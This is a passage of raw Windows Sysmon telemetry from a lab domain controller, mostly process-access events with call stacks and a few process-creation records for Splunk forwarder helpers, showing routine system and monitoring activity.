L+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002570Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:30.726{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002569Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:30.726{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002568Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:30.726{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-855A-5FCF-7800-000000009101}2216C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002567Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:30.726{10ACEC4A-8551-5FCF-3300-000000009101}30803808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-855A-5FCF-7800-000000009101}2216C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002566Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:30.530{10ACEC4A-855A-5FCF-7800-000000009101}2216C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002565Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:29.992{10ACEC4A-8559-5FCF-7700-000000009101}40723972C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002594Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:31.617{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-855B-5FCF-7900-000000009101}4008C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002593Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:31.617{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002592Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:31.617{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002591Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:31.617{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002590Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:31.617{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002589Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:31.617{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002588Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:31.617{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002587Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:31.617{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002586Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:31.617{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002585Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:31.617{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002584Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:31.617{10ACEC4A-853E-5FCF-0500-000000009101}6441164C:\Windows\system32\csrss.exe{10ACEC4A-855B-5FCF-7900-000000009101}4008C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002583Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:31.617{10ACEC4A-8551-5FCF-3300-000000009101}30803808C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{10ACEC4A-855B-5FCF-7900-000000009101}4008C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002582Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:31.420{10ACEC4A-855B-5FCF-7900-000000009101}4008C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe8.0.2Performance monitorsplunk ApplicationSplunk Inc.splunk-perfmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=1F3027C93882E5D5A667B84CCEF3ED67,SHA256=504CDB3742BCBF617C837270CCEC0243205B7BF0A6AB5117EFB838DD2F004AAC,IMPHASH=53D37CD53647C5D82FCFA9E6970E154E{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002581Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:31.258{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002580Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:31.258{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002579Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:31.258{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002608Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:32.664{10ACEC4A-855C-5FCF-7A00-000000009101}36003532C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002607Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:32.508{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-855C-5FCF-7A00-000000009101}3600C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002606Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:32.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002605Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:32.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002604Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:32.508{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 